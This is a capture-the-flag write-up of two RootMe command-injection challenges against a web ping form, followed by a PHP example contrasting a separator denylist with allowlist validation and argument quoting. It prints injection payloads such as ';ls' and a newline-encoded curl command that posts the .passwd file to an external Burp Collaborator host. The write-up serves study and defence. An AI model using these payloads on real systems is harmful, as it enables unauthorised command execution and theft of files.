RootMe - Command Injection
1. PHP - Command injection
Mission
Find a vulnerability in this service and exploit it.
You must manage to read index.php
Solution
1) Open the challenge and find the page that pings localhost:

3) Put ;ls at the end of the IP to check whether it is injectable:

4) Once it is proven injectable, add ;ls -lah after the IP to see all files:

5) Find a file named .passwd. I tried to cat it and cat did not work, so I tried the more command and it succeeded:

Finished. Happy Hacking!
2. Command injection - Filter bypass
Mission
Find a vulnerability in this service and exploit it. Some protections were added.
The flag is on the index.php file.
Solution
1) Open the challenge and I find an input for pinging an IP. Enter an IP and it comes back with ping ok:

2) Add ;ls after the IP, but it comes back with a syntax error:

3) Open Burp Suite and try payloads. After all of that, I find that the newline (\n, %0a) works and curl works:

4) Now try to extract data with curl:

5) Now let's create the payload for our challenge. I will use Burp Collaborator to receive the request:
+%0a+curl+-X+POST+--data+"@.passwd"+e4jl0kjtbe9519gxifjw0lm2yt4ksbg0.oastify.com
6) Open Burp Collaborator and I find a request to it with the data in .passwd .txt:
Finished. Happy Hacking!
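Why the protection in the second challenge fails and what closes the hole, as an added example that is not the challenge's source or the author's code: a denylist of shell separators is compared with allowlist validation plus argument quoting. The denylist is an assumed filter (the page does not show the real one), and the function names and sample inputs are hypothetical.

```php
<?php
// Added example: hypothetical handlers, not the challenge's real source.

// Denylist in the style the second challenge suggests (assumed): reject
// well-known shell separators. A line feed (%0a once URL-decoded) is not on
// the list, and sh treats it as a command terminator just like ';'.
function denylist_accepts(string $ip): bool
{
    return preg_match('/[;|&`$]/', $ip) === 0;
}

// Allowlist: the whole value must parse as an IPv4 or IPv6 literal.
function allowlist_accepts(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP) !== false;
}

// Build the command only from validated input, quoted as a single argument.
// Returns null when the input is rejected.
function build_ping_command(string $ip): ?string
{
    if (!allowlist_accepts($ip)) {
        return null;
    }
    return 'ping -c 1 ' . escapeshellarg($ip);
}

// Constructed sample inputs: one valid address and the two input shapes
// seen in the walkthrough (";ls" and a line feed followed by a command).
$samples = [
    'plain address' => '127.0.0.1',
    'semicolon'     => '127.0.0.1;ls',
    'line feed'     => "127.0.0.1\nls",
];

foreach ($samples as $label => $ip) {
    printf(
        "%-14s denylist=%-6s allowlist=%-6s command=%s\n",
        $label,
        denylist_accepts($ip) ? 'pass' : 'block',
        allowlist_accepts($ip) ? 'pass' : 'block',
        build_ping_command($ip) ?? '(rejected)'
    );
}
```

The line-feed sample passes the denylist but is rejected by the allowlist, which is the gap the %0a payload relies on.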